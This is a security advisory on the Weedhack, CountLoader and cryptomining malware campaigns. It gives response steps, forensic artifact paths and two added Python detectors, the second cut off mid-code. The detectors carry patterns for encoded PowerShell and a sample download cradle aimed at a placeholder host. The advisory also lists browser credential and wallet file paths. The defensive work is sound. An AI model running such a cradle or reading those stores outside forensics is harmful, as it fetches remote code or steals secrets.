Severity: HIGH
CVSS: 7.5
Priority: 0.740
Executive Summary
Three active malware campaigns, Weedhack, CountLoader, and an unnamed cryptomining operation, have collectively compromised over 86,000 endpoints by exploiting consumer trust in gaming content, pirated software, and streaming sites. Weedhack targets Minecraft players with credential-stealing malware capable of draining browser-stored passwords and cryptocurrency wallets; CountLoader establishes persistent remote access footholds via cracked software channels; the third campaign hijacks clipboard data to redirect cryptocurrency transactions while silently mining Monero. Organizations face a dual risk: direct endpoint compromise through employee personal device crossover, and enterprise network intrusion via CountLoader's Cobalt Strike and AdaptixC2 beacons, which are designed for lateral movement.
Plain & Simple
Here's what you need to know. No jargon, just the basics.
Are you affected?
Yes, if you play Minecraft and downloaded a hacked game client from YouTube recently.
What got out
Confirmed: passwords saved in your web browser may have been stolen
Confirmed: cryptocurrency wallet details on your device may have been taken
Suspected: login sessions for websites you were signed into may have been copied
Do this now
1. Stop using any Minecraft hacked client you downloaded from YouTube and delete it from your device.
2. Change the passwords for your email, bank, and any crypto accounts using a device you trust.
3. Turn on a second password sent to your phone for your email and any crypto accounts.
Watch for these
Your crypto wallet sending money you did not send; check your transaction history now.
Emails or messages saying someone logged into your accounts from a new device.
Anyone asking you to confirm payments or send money after you were affected.
Should you worry?
This is serious if you downloaded a hacked Minecraft client recently. If you did not, you are not at risk from this specific threat.
Impact Assessment
CISA KEV Status: Not listed
Threat Severity: HIGH. Prioritize for investigation.
Actor Attribution: HIGH. Weedhack operators (unattributed), CountLoader MaaS operators (unattributed).
TTP Sophistication: HIGH. 25 MITRE ATT&CK techniques identified.
Detection Difficulty: HIGH. Multiple evasion techniques observed.
Target Scope: INFO. Minecraft (versions 1.21.0-1.21.11), Microsoft Defender, Windows (mshta.exe/PowerShell), XMRig, Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, PureMiner, SilentCryptoMiner, Discord, Steam, Telegram, 36 web browsers, 56 browser-based crypto wallets, 12 desktop wallet apps.
Are You Exposed?
Heightened risk: your industry is targeted by Weedhack operators (unattributed) or CountLoader MaaS operators (unattributed).
Assess exposure: you use products/services from Minecraft (versions 1.21.0-1.21.11).
Review detection coverage: 25 attack techniques identified; check your coverage for these TTPs.
Reduced risk: your EDR/XDR detects the listed IOCs and TTPs.
Prepared: you have incident response procedures for this threat type.
Assessment estimated from severity rating and threat indicators.
Business Context
Over 86,000 confirmed compromises represent direct operational risk: credential theft from employee endpoints — including browser-stored passwords and cryptocurrency wallet keys — can escalate to enterprise network intrusion via CountLoader's Cobalt Strike beacons, enabling ransomware staging, data exfiltration, or supply chain attacks. Organizations in financial services, technology, or any sector where employees hold cryptocurrency assets face immediate financial loss through wallet drainage and clipboard hijacking. Because CountLoader is sold as a service, access to compromised environments is likely resold, so the initial compromise may be only the first stage of a more targeted attack by a secondary threat actor.
You Are Affected If
Employees run Minecraft Java Edition (versions 1.21.0–1.21.11) on any device — personal or corporate — that shares network access or credential stores with work systems
Users download software from unofficial sources, cracked software sites, or pirated streaming platforms on corporate-managed or BYOD endpoints
Endpoints run Windows with mshta.exe and PowerShell accessible to user-context processes and not restricted by application allowlisting or constrained language mode
Microsoft Defender is the sole endpoint protection layer with no additional EDR behavioral monitoring for LOLBin abuse (mshta.exe, PowerShell)
Browser-stored credentials or cryptocurrency wallet applications are present on endpoints without enforced enterprise password manager policies
Board Talking Points
Over 86,000 devices have been confirmed compromised by three simultaneous malware campaigns targeting employees through gaming downloads, pirated software, and streaming sites — campaigns designed to steal passwords and establish persistent attacker footholds.
Security teams should immediately audit endpoint controls for PowerShell and scripting restrictions, enforce MFA across all externally-exposed systems, and deploy behavioral detection rules within 72 hours.
Without action, a single compromised employee endpoint can provide attackers a persistent beachhead into the enterprise network, enabling ransomware deployment, data theft, or fraudulent financial transactions.
PCI-DSS — Amatera Stealer targets 56 browser-based cryptocurrency wallets and 12 desktop wallet apps; if employees store or process payment card credentials in browsers on affected endpoints, card data exposure is a direct risk requiring incident assessment under PCI-DSS Requirement 12.10
GDPR / regional data protection — Credential theft across 36 browsers on employee endpoints may include access to personal data processed in web applications, triggering breach notification obligations if enterprise data is confirmed exfiltrated
Technical Analysis
Three concurrent campaigns share delivery-chain characteristics (YouTube social engineering, pirated content sites, and cracked software distribution) while deploying distinct payloads.
Weedhack: Targets Minecraft Java Edition versions 1.21.0-1.21.11. Trojanized hacked clients (notably Wurst) are distributed via YouTube lure videos. Payload chain delivers PureHVNC RAT and Amatera Stealer. Stealer harvests credentials from 36 browsers, 56 browser-based crypto wallets, and 12 desktop wallet apps. Exfiltration channels: Discord, Steam, and Telegram webhooks/APIs. Persistence via mshta.exe (T1218.005) and PowerShell (T1059.001). Microsoft Defender evasion confirmed (T1562.001). Relevant CWEs: CWE-829 (inclusion of functionality from untrusted control sphere), CWE-426 (untrusted search path), CWE-494 (download of code without integrity check).
CountLoader: MaaS framework distributed via cracked software sites. Multi-stage loader delivers Cobalt Strike and AdaptixC2 C2 beacons. Establishes persistent remote access via PowerShell (T1059.001) and JavaScript (T1059.007) execution, registry modification (T1112), and boot/logon autostart (T1547). DLL sideloading (T1574.002) and process injection (T1055) observed. Obfuscation (T1027) and code signing abuse (T1553) used to bypass defenses.
Unnamed cryptomining campaign: Delivered via pirated streaming sites. Payloads: PureMiner and SilentCryptoMiner (XMRig-based, T1496). Clipboard hijacking (T1115) redirects outbound cryptocurrency transactions. Proxy-based C2 (T1090) for miner management. Persistence mirrors the Weedhack pattern: mshta.exe and PowerShell abuse.
Shared TTPs across all three: T1204.002 (malicious file execution), T1566 (phishing/social engineering lure), T1071.001 (application layer C2 over HTTP/S), T1041 (exfiltration over C2 channel), T1056.001 (keylogging), T1555 (credential store access), T1539 (session token theft), T1113 (screen capture), T1125 (video capture). No CVE identifiers are associated with this campaign set; exploitation is social engineering-driven, not vulnerability-based. No vendor patch is applicable; mitigation is behavioral and policy-driven.
Action Checklist (IR enriched)
Triage Priority: IMMEDIATE
Escalate to senior IR leadership, legal counsel, and potentially CISA if: (1) Amatera Stealer exfiltration is confirmed from endpoints storing PII, PHI, or financial credentials triggering state breach notification obligations; (2) Cobalt Strike or AdaptixC2 beaconing is detected indicating CountLoader has progressed beyond initial access to active operator-controlled intrusion; (3) more than 10 endpoints show XMRig or clipboard hijacker activity indicating campaign-scale compromise beyond isolated user incidents; or (4) harvested credentials are confirmed used for unauthorized access to corporate systems, cloud accounts, or cryptocurrency wallets holding organizational funds.
Step 1: Containment. Block known delivery channels at the network perimeter: deny outbound connections to Discord, Steam, and Telegram API endpoints from non-approved endpoints; block pirated streaming site categories via DNS/web proxy filtering. Isolate any endpoint exhibiting mshta.exe or PowerShell spawning from browser or media player processes. Reference: NIST SI-4 (System Monitoring), CIS Benchmark 4.4 (Firewall on Servers), CIS Benchmark 4.5 (Firewall on End-User Devices). Concrete steps: Add firewall rules to block api.telegram.org, cdn.discordapp.com, api.steampowered.com on your perimeter gateway.
IR Detail: Containment
NIST 800-61r3 §3.3 — Containment Strategy
NIST SI-4 (System Monitoring)
NIST AC-4 (Information Flow Enforcement)
NIST SC-7 (Boundary Protection)
CIS 4.4 (Implement and Manage a Firewall on Servers)
CIS 4.5 (Implement and Manage a Firewall on End-User Devices)
Compensating Control
For teams without NGFW or proxy: deploy Windows Firewall GPO rules blocking outbound TCP 443 to cdn.discordapp.com, api.steampowered.com, and api.telegram.org for all user-tier processes except explicitly approved apps — use 'netsh advfirewall firewall add rule' or PowerShell New-NetFirewallRule targeting by remote address ranges (both match on IP addresses, so resolve the hostnames to their current ranges first). Use Pi-hole or Windows DNS policy to sinkhole known pirated streaming domains. For mshta.exe isolation, deploy a Sysmon rule (Event ID 1) alerting on mshta.exe with ParentImage matching chrome.exe, firefox.exe, vlc.exe, or java.exe; route the alert to a local log file monitored via a scheduled task running a PowerShell log-scan script every 15 minutes.
Preserve Evidence
Before isolating the endpoint, capture: full Sysmon Event ID 1 logs showing the parent-child process chain (e.g., chrome.exe or a Minecraft launcher spawning mshta.exe or powershell.exe); Windows Security Event ID 4688 with command-line logging enabled showing encoded PowerShell invocations tied to CountLoader or Weedhack dropper activity; Windows Firewall operational log (Microsoft-Windows-Windows Firewall With Advanced Security/Firewall) for outbound connection attempts to Discord CDN, Telegram Bot API, and Steam API endpoints; network capture (pcap via Wireshark on the gateway) of DNS queries and TCP sessions to cdn.discordapp.com and api.telegram.org from the affected host; memory image (via WinPmem or Magnet RAM Capture) before isolation if Cobalt Strike or AdaptixC2 beacon is suspected resident in-memory.
Step 2: Detection. Search endpoint logs for: (a) mshta.exe or PowerShell child processes spawned by browser, game launcher, or media player executables; (b) PowerShell executing encoded or suspicious commands (-EncodedCommand flags, IEX, Get-Content); (c) outbound HTTP/S connections to Discord CDN (cdn.discordapp.com), Steam API (api.steampowered.com), or Telegram Bot API (api.telegram.org) from non-approved processes; (d) clipboard monitoring API calls (OpenClipboard/GetClipboardData) from unsigned or newly installed processes; (e) XMRig process signatures or CPU utilization spikes on endpoints not running authorized compute workloads. Event IDs to review: Windows Security 4688 (process creation with command line), Sysmon Event ID 1 (process creation), Sysmon Event ID 3 (network connection). Reference: NIST AU-2 (Event Logging), NIST AU-6 (Audit Record Review), NIST SI-4, CIS Benchmark 8.2 (Collect Audit Logs).
IR Detail: Detection & Analysis
NIST 800-61r3 §3.2 — Detection and Analysis
NIST AU-2 (Event Logging)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
NIST SI-4 (System Monitoring)
NIST AU-12 (Audit Record Generation)
CIS 8.2 (Collect Audit Logs)
Compensating Control
Without a SIEM, deploy Sysmon with SwiftOnSecurity's config (includes mshta.exe, PowerShell encoding, and network connection rules out of the box); forward Sysmon and Security logs to a central Windows Event Forwarding (WEF) collector at no cost. Run this PowerShell one-liner on each host to surface encoded command execution: Get-WinEvent -LogName Security | Where-Object {$_.Id -eq 4688 -and $_.Message -match 'EncodedCommand|IEX|Get-Content'} | Select-Object TimeCreated, Message | Export-Csv encoded_ps.csv. For clipboard hijacker detection (targeting crypto wallet address substitution by Weedhack/SilentCryptoMiner), use Sysmon Event ID 10 (ProcessAccess) filtering on GrantedAccess 0x1fffff where TargetImage is the calling process; cross-reference with osquery query: SELECT * FROM processes WHERE name LIKE '%xmrig%' OR cmdline LIKE '%stratum%' to detect XMRig pool connections. Use the Sigma rule 'proc_creation_win_mshta_suspicious_parent.yml' from SigmaHQ for mshta parent-process anomalies.
Preserve Evidence
Collect before completing analysis: Sysmon Event ID 3 (NetworkConnect) logs filtered for connections from mshta.exe, powershell.exe, or newly created processes to Discord CDN IP ranges (162.159.x.x Cloudflare space used by Discord) and Telegram API (149.154.x.x, 91.108.x.x); Sysmon Event ID 8 (CreateRemoteThread) entries showing potential Cobalt Strike or AdaptixC2 injection into legitimate host processes; Windows Security Event ID 4657 (Registry value modified) or Sysmon Event ID 13 for writes to HKCU\Software\Microsoft\Windows\CurrentVersion\Run by any process other than a known installer; browser credential store files before they are wiped — copy %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data, %APPDATA%\Mozilla\Firefox\Profiles\*.default\logins.json, and equivalent paths for all 36 targeted browsers; desktop crypto wallet data directories (e.g., %APPDATA%\Exodus, %APPDATA%\Electrum\wallets, %APPDATA%\Atomic) to establish whether Amatera Stealer exfiltrated wallet files.
Step 3: Eradication. No vendor patch applies; these campaigns are social engineering-driven. Eradication steps: (a) Remove identified malware artifacts (PureHVNC RAT, Amatera Stealer, PureMiner, SilentCryptoMiner, Cobalt Strike/AdaptixC2 beacon files) using EDR tooling; (b) enforce application allowlisting to block unauthorized executables including mshta.exe invocations outside system contexts (reference: NIST CM-7, CIS Benchmark 2.3 Address Unauthorized Software); (c) revoke and rotate all credentials stored in browsers on affected endpoints (reference: D3-CRO Credential Rotation, D3-CH Credential Hardening); (d) audit and remove unauthorized software including game hacking clients and cracked applications per CIS Benchmark 2.1 and CIS Benchmark 2.3.
IR Detail: Eradication
NIST 800-61r3 §3.4 — Eradication
NIST CM-7 (Least Functionality)
NIST SI-2 (Flaw Remediation)
NIST IA-5 (Authenticator Management)
NIST AC-2 (Account Management)
CIS 2.1 (Establish and Maintain a Software Inventory)
CIS 2.3 (Address Unauthorized Software)
Compensating Control
Without EDR, build YARA rules targeting PureHVNC, PureMiner, and SilentCryptoMiner string signatures (search GitHub for published rules from ANY.RUN or Malpedia entries for these families); run via YARA CLI: yara -r purehvnc_rule.yar C:\ > hits.txt. Use Autoruns (Sysinternals) to enumerate and delete persistence entries written by the malware to HKCU\Software\Microsoft\Windows\CurrentVersion\Run, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, and scheduled task XML files under C:\Windows\System32\Tasks. Disable mshta.exe invocation outside trusted installer contexts via Windows AppLocker Publisher or Path rules (available on Windows 10 Pro/Enterprise at no cost): deny mshta.exe execution for all users except SYSTEM in a GPO-linked AppLocker policy. For credential revocation without enterprise tooling, use a browser-exported credentials audit: instruct users to run 'chrome://settings/passwords' export, identify all stored credentials, force password resets at the service level for every stored credential, then clear browser profiles entirely rather than selectively.
Preserve Evidence
Before eradication, forensically image or collect: full directory listing and hash inventory of C:\Users\[user]\AppData\Roaming and C:\Users\[user]\AppData\Local\Temp where CountLoader, Weedhack, and PureMiner dropper artifacts are typically staged; hash values (SHA-256) of every executable in the affected user's Downloads, Desktop, and temp folders for submission to VirusTotal and internal IOC tracking; export of all scheduled tasks (schtasks /query /fo CSV /v > tasks_export.csv) and all Run/RunOnce registry keys before removal to document persistence mechanism specifics used by this campaign; collected browser Login Data SQLite files and any crypto wallet seed/keystore files present under the 12 targeted desktop wallet app directories (Exodus, Electrum, Atomic, Coinomi, etc.) to establish scope of potential credential and wallet compromise; a process memory dump of any running instance of xmrig.exe or an unrecognized process with high CPU utilization to extract XMR wallet address and mining pool URL for IOC reporting and victim notification.
Step 4: Recovery. Validate remediation by: (a) confirming no mshta.exe or unauthorized PowerShell execution recurs via EDR telemetry for 72 hours post-cleanup; (b) verifying browser credential stores have been cleared and repopulated only with freshly rotated credentials; (c) scanning for XMRig process artifacts or residual scheduled tasks/autostart registry keys (HKCU\Software\Microsoft\Windows\CurrentVersion\Run) created by malware; (d) monitoring cryptocurrency wallet addresses associated with affected users for unauthorized transactions. Reference: NIST IR-4 (Incident Handling), NIST AU-6, D3-LAM (Local Account Monitoring).
IR Detail: Recovery
NIST 800-61r3 §3.5 — Recovery
NIST IR-4 (Incident Handling)
NIST AU-6 (Audit Record Review, Analysis, and Reporting)
NIST CM-7 (Least Functionality)
NIST AC-2 (Account Management)
CIS 7.2 (Establish and Maintain a Remediation Process)
Compensating Control
Without EDR telemetry, run a recurring scheduled task (every 4 hours for the 72-hour window) executing this PowerShell validation script: Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | Where-Object {$_.Id -eq 1 -and ($_.Message -match 'mshta.exe' -or ($_.Message -match 'powershell' -and $_.Message -match 'EncodedCommand'))} | Export-Csv C:\IR\recovery_check.csv -Append — review output daily. Validate credential store clearance by checking Chrome Login Data file size (should be minimal if cleared) and verifying Firefox logins.json is absent or empty in all user profiles. For autorun registry persistence verification, run Autoruns with 'Hide Microsoft Entries' checked and export to CSV baseline; diff against a clean reference system. For XMR wallet monitoring, use a free blockchain explorer (e.g., xmrchain.net) with the extracted wallet address from memory forensics to check for outbound transactions.
Preserve Evidence
Evidence to confirm successful recovery: Sysmon Event ID 1 logs for the 72-hour post-cleanup window showing no new instances of mshta.exe, xmrig.exe, pureminer.exe, or powershell.exe with -EncodedCommand flags; Autoruns CSV export post-cleanup showing no entries under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, scheduled tasks, or AppInit_DLLs that were not present on a clean reference baseline; browser profile directory timestamps confirming credential stores were cleared and recreated after the malware removal timestamp; Windows Security Event ID 4720/4726 (account created/deleted) and 4648 (explicit credential use) logs to detect any post-compromise lateral movement or new account creation by PureHVNC RAT before containment was confirmed complete; network flow logs (or Windows Firewall logs) for the recovery period confirming absence of outbound connections to previously identified C2 infrastructure associated with Cobalt Strike, AdaptixC2, or XMRig stratum pool endpoints.
Step 5: Post-Incident. Control gaps exposed by this campaign set: (a) absence of application allowlisting allowing unsigned executables, remediate via NIST CM-7 (Least Functionality) and CIS Benchmark 2.3; (b) insufficient user awareness around gaming and pirated content risks, address via NIST AT-2 (Awareness Training); (c) browser credential storage in plaintext/accessible stores, enforce enterprise password manager policy and disable browser-native credential storage (reference: NIST IA-5, D3-CH); (d) MFA gaps on accounts whose credentials may have been harvested, enforce MFA on all externally-exposed applications and administrative access (CIS Benchmark 6.3, CIS Benchmark 6.5, D3-MFA); (e) inadequate monitoring of mshta.exe and PowerShell LOLBin abuse, implement Sysmon rules and SIEM detections for living-off-the-land binary abuse (NIST SI-4, AU-12).
IR Detail: Post-Incident
NIST 800-61r3 §4 — Post-Incident Activity
NIST CM-7 (Least Functionality)
NIST AT-2 (Literacy Training and Awareness)
NIST IA-5 (Authenticator Management)
NIST SI-4 (System Monitoring)
NIST AU-12 (Audit Record Generation)
CIS 2.3 (Address Unauthorized Software)
CIS 6.3 (Require MFA for Externally-Exposed Applications)
CIS 6.5 (Require MFA for Administrative Access)
Compensating Control
For AppLocker deployment on a zero-budget team: enable AppLocker via GPO (Computer Configuration > Windows Settings > Security Settings > Application Control Policies) with rules denying execution from %TEMP%, %APPDATA%, and user-writable paths — this directly blocks the dropper delivery paths used by Weedhack and CountLoader without any commercial tooling. For awareness training specific to this campaign, build a 10-minute internal briefing using screenshots from the Weedhack Minecraft mod delivery lure and CountLoader cracked software channels; focus on the specific social engineering premise (gaming performance tools, pirated content) rather than generic phishing. For free password manager enforcement, deploy Bitwarden (self-hosted or cloud free tier) and publish a policy prohibiting browser-native credential storage — enforce by GPO setting DisablePasswordReveal and the Chrome policy PasswordManagerEnabled=false via ADM template. For LOLBin detection hardening, add the Sigma ruleset 'windows/process_creation/proc_creation_win_lolbin_*.yml' from SigmaHQ to your WEF/Sysmon pipeline and tune false positives against your environment's legitimate mshta.exe and PowerShell usage baseline.
Preserve Evidence
Post-incident artifacts to collect for lessons learned and threat intelligence sharing: final IOC list compiled from all recovered artifacts — XMR wallet addresses, Cobalt Strike/AdaptixC2 C2 IP addresses and domain names, file hashes (SHA-256) of all identified PureHVNC, Amatera Stealer, PureMiner, and SilentCryptoMiner samples for submission to CISA's Malware Next-Gen Analysis platform and sharing via ISAC if applicable; documentation of all 36 browser credential stores and 12 desktop wallet application paths confirmed affected to support user notification and scope reporting; AppLocker or software restriction policy baseline gaps documented — specifically which unsigned executables were found in %TEMP% and %APPDATA% paths that a deny-by-default policy would have blocked; timeline reconstruction mapping the initial Minecraft mod or cracked installer download event (browser download history, Windows Prefetch files under C:\Windows\Prefetch for the dropper binary name) through to first C2 callback for post-incident report and detection rule improvement; gap analysis comparing pre-incident Sysmon configuration against SwiftOnSecurity's recommended baseline to document which LOLBin execution events were not being logged at time of compromise.
Recovery Guidance
Post-containment, maintain elevated monitoring of mshta.exe, PowerShell encoding activity, and outbound connections to Discord/Telegram/Steam API endpoints for a minimum of 14 days given that PureHVNC RAT and Cobalt Strike/AdaptixC2 implants may have staged secondary persistence mechanisms not captured in initial eradication. Verify all 36 browser credential stores and 12 desktop wallet application directories on affected endpoints have been cleared and that users have rotated credentials at every service where a stored password was present — prioritize cryptocurrency exchange accounts and any corporate SSO credentials given the Amatera Stealer's confirmed targeting of these asset types. Confirm Minecraft clients on affected systems are sourced exclusively from the official Mojang/Microsoft launcher after incident closure, and validate that no unofficial mod loaders (e.g., unlicensed Forge or Fabric installers sourced from third-party sites) remain installed, as these represent the primary re-infection vector for Weedhack.
Key Forensic Artifacts
Windows Prefetch files (C:\Windows\Prefetch\MSHTA.EXE-*.pf and POWERSHELL.EXE-*.pf) — these record execution timestamps and file paths for mshta.exe and PowerShell invocations triggered by Weedhack and CountLoader droppers, providing initial execution timeline even if the dropper binary has been deleted
Browser SQLite credential databases before clearance: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data, %APPDATA%\Mozilla\Firefox\Profiles\*.default-release\logins.json, and equivalent paths for all targeted browsers — Amatera Stealer specifically targets these files and their timestamps will show last-access time consistent with exfiltration
Desktop crypto wallet keystore and seed files under %APPDATA%\Exodus\exodus.wallet, %APPDATA%\Electrum\wallets\*, %APPDATA%\Atomic\Local Storage\leveldb\*, and equivalent paths for the 12 targeted wallet apps — presence of recent access timestamps inconsistent with user activity indicates Amatera Stealer collection activity
Sysmon Event ID 10 (ProcessAccess) logs capturing clipboard API access (OpenClipboard/GetClipboardData calls) from unsigned or newly installed processes — these are the direct forensic signature of the clipboard hijacker component within SilentCryptoMiner and Weedhack targeting cryptocurrency wallet address substitution
XMRig configuration file and stratum connection artifacts: search %TEMP%, %APPDATA%, and all user-writable paths for config.json files containing 'pool' and 'wallet' keys, and extract XMR wallet address and pool URL from Sysmon Event ID 3 (NetworkConnect) logs showing outbound TCP 3333/4444/14444 (standard XMRig stratum ports) from xmrig.exe or a renamed variant — these provide attribution data and victim wallet compromise confirmation
Detection Guidance
Behavioral indicators (prioritize these, no CVE-based signatures apply):
1. Process lineage anomalies: mshta.exe or PowerShell spawned as a child of a browser (chrome.exe, firefox.exe, msedge.exe), game launcher (javaw.exe, Minecraft launcher), or media player. This is not normal behavior and should alert immediately.
2. Encoded PowerShell execution: Command lines containing -EncodedCommand, IEX (Invoke-Expression), or DownloadString from non-administrative contexts. Sysmon Event ID 1 with CommandLine field matching these patterns.
3. Clipboard API abuse: Processes calling OpenClipboard/GetClipboardData at high frequency, particularly unsigned or recently installed binaries. Cross-reference with cryptocurrency wallet address patterns (Ethereum: 0x + 40 hex characters; Bitcoin: 26-35 base58 characters; Monero: 104-110 base58 characters) in clipboard content.
4. C2 exfiltration channels: Outbound HTTPS connections to api.telegram.org, cdn.discordapp.com, or steamcommunity.com from non-browser, non-approved processes. NIST AU-3 requires audit records to capture the source process; confirm your logging captures this field.
5. XMRig/cryptominer indicators: CPU utilization sustained above 80% on endpoints during off-hours; process names or hashes matching XMRig, PureMiner, or SilentCryptoMiner; outbound connections to Monero mining pool domains (pool.supportxmr.com, xmrpool.eu, minexmr.com and similar).
6. Persistence mechanisms: New entries in HKCU\Software\Microsoft\Windows\CurrentVersion\Run or HKLM equivalent created by non-system processes; scheduled tasks created by user-context processes; DLL files placed in application directories alongside legitimate executables (DLL sideloading, T1574.002). Use D3-SICA (MITRE ATT&CK Defense System Init Config Analysis) and D3-SFA (System File Analysis) to baseline and monitor these locations.
7. Cobalt Strike/AdaptixC2 beacon patterns: Periodic beaconing at regular intervals (every 60s, 120s, or 300s) to HTTPS endpoints; JA3/JA3S TLS fingerprints matching known Cobalt Strike profiles; large POST requests to pseudo-random URI paths. Reference NIST AU-6 and SI-4 for continuous monitoring requirements.
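Indicators 1 to 3 above can be checked mechanically. The following is an added example (not code from the original page or from any vendor): it evaluates constructed Sysmon Event ID 1 records for LOLBin lineage anomalies and encoded PowerShell (decoding the -EncodedCommand payload so that IEX/DownloadString hidden in base64 are still matched), and classifies clipboard strings against the wallet address shapes listed in indicator 3. Process names, paths and the sample records are assumptions made for the example.

```python
import base64
import re
from typing import Dict, List, Optional

# Parents that should never spawn a LOLBin (indicator 1): browsers, the Java runtime
# behind the Minecraft launcher, and a media player. Chosen for this example.
RISKY_PARENTS = {"chrome.exe", "firefox.exe", "msedge.exe", "javaw.exe", "vlc.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe"}

# Command-line patterns from indicator 2. PowerShell accepts abbreviated forms of
# -EncodedCommand (-e, -ec, -enc), so the first pattern covers those too.
SUSPICIOUS_PATTERNS = {
    "encodedcommand": re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
    "iex": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "downloadstring": re.compile(r"\bdownloadstring\b", re.I),
}
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# Wallet address shapes exactly as listed in indicator 3 (Monero length taken from the text above).
ADDRESS_PATTERNS = {
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "bitcoin": re.compile(r"^[1-9A-HJ-NP-Za-km-z]{26,35}$"),
    "monero": re.compile(r"^[1-9A-HJ-NP-Za-km-z]{104,110}$"),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path from the Image/ParentImage fields."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand: base64 of UTF-16LE text."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate_process_event(event: Dict[str, str]) -> List[str]:
    """Return the indicator names a Sysmon Event ID 1 record triggers (empty list if none)."""
    findings: List[str] = []
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    cmdline = event.get("CommandLine", "")
    if image in LOLBINS and parent in RISKY_PARENTS:
        findings.append(f"lineage:{parent}->{image}")
    # Match the visible command line and, if present, the decoded payload.
    decoded = decode_encoded_command(cmdline) or ""
    for name, pattern in SUSPICIOUS_PATTERNS.items():
        if pattern.search(cmdline) or pattern.search(decoded):
            findings.append(f"cmdline:{name}")
    return findings


def classify_clipboard(text: str) -> Optional[str]:
    """Name the wallet address type a clipboard string looks like, or None."""
    candidate = text.strip()
    for coin, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(candidate):
            return coin
    return None


def build_sample_events() -> List[Dict[str, str]]:
    """Constructed Sysmon Event ID 1 records, not real telemetry from the campaigns."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/s')"
    encoded = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    return [
        {"Image": r"C:\Windows\System32\mshta.exe",
         "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
         "CommandLine": r"mshta.exe C:\Users\u\AppData\Local\Temp\upd.hta"},
        {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "ParentImage": r"C:\Program Files\Java\bin\javaw.exe",
         "CommandLine": f"powershell.exe -nop -w hidden -enc {encoded}"},
        # Benign admin script launched from the shell: must not alert.
        {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "ParentImage": r"C:\Windows\explorer.exe",
         "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    ]


if __name__ == "__main__":
    for event in build_sample_events():
        print(basename(event["Image"]), evaluate_process_event(event))
    for sample in ("0x" + "ab" * 20, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2", "plain text"):
        print(sample[:12], classify_clipboard(sample))
```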
Log sources to enable if not already active: Windows Security Event Log (4688 with command-line auditing), Sysmon (Events 1, 3, 11, 13), DNS query logs, proxy/web gateway logs with full URL and process attribution, EDR telemetry.
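Indicator 7 (periodic beaconing) is a statistical check rather than a string match. The following is an added example, not from the original page: it groups constructed Sysmon Event ID 3 records by host, process and destination, computes the inter-connection gaps, and flags groups whose gaps are near-constant (low coefficient of variation), which separates a 60-second beacon from bursty browser traffic. Host names, process paths, the 203.0.113.0/24 and 198.51.100.0/24 addresses and the jitter threshold are assumptions made for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

BASE = datetime(2025, 1, 15, 2, 0, 0)  # constructed off-hours start time


def connection(host: str, image: str, ip: str, port: int, offset_s: float) -> Dict[str, object]:
    """One constructed Sysmon Event ID 3 (NetworkConnect) record."""
    return {"Computer": host, "Image": image, "DestinationIp": ip,
            "DestinationPort": port, "UtcTime": BASE + timedelta(seconds=offset_s)}


def build_sample_connections() -> List[Dict[str, object]]:
    """Constructed telemetry: a 60 s beacon with slight jitter, a browser, and a short-lived group."""
    events: List[Dict[str, object]] = []
    # Beacon from an unsigned binary in the user profile: ten connections 60 s apart,
    # each shifted by a few seconds of jitter.
    for i, jitter in enumerate([0, 1, -1, 2, -2, 1, 0, -1, 1, 0]):
        events.append(connection("WS-0423", r"C:\Users\u\AppData\Roaming\wupdate.exe",
                                 "203.0.113.10", 443, 60 * i + jitter))
    # Browser: bursty, irregular gaps typical of interactive use.
    for offset in [0, 5, 47, 50, 130, 131, 400, 401, 402, 900]:
        events.append(connection("WS-0423", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                                 "198.51.100.7", 443, offset))
    # Too few connections to judge periodicity; must be ignored.
    for offset in [10, 70, 130]:
        events.append(connection("WS-0423", r"C:\Windows\System32\svchost.exe", "192.0.2.5", 80, offset))
    return events


def detect_beacons(events: List[Dict[str, object]], min_connections: int = 8,
                   max_jitter: float = 0.15) -> List[Dict[str, object]]:
    """Flag (host, process, destination) tuples whose connection gaps are near-constant.

    Jitter is the coefficient of variation of the gaps (population stdev / mean). A fixed
    60/120/300 s beacon with a few seconds of sleep jitter stays well below 0.15, while
    interactive traffic is far above it. Tune the threshold against your own baseline."""
    groups: Dict[tuple, List[datetime]] = defaultdict(list)
    for e in events:
        image = str(e["Image"]).rsplit("\\", 1)[-1].lower()
        groups[(e["Computer"], image, e["DestinationIp"], e["DestinationPort"])].append(e["UtcTime"])
    findings: List[Dict[str, object]] = []
    for (host, image, ip, port), times in groups.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean
        if jitter <= max_jitter:
            findings.append({"host": host, "process": image, "remote": f"{ip}:{port}",
                             "count": len(times), "interval_s": round(mean, 1),
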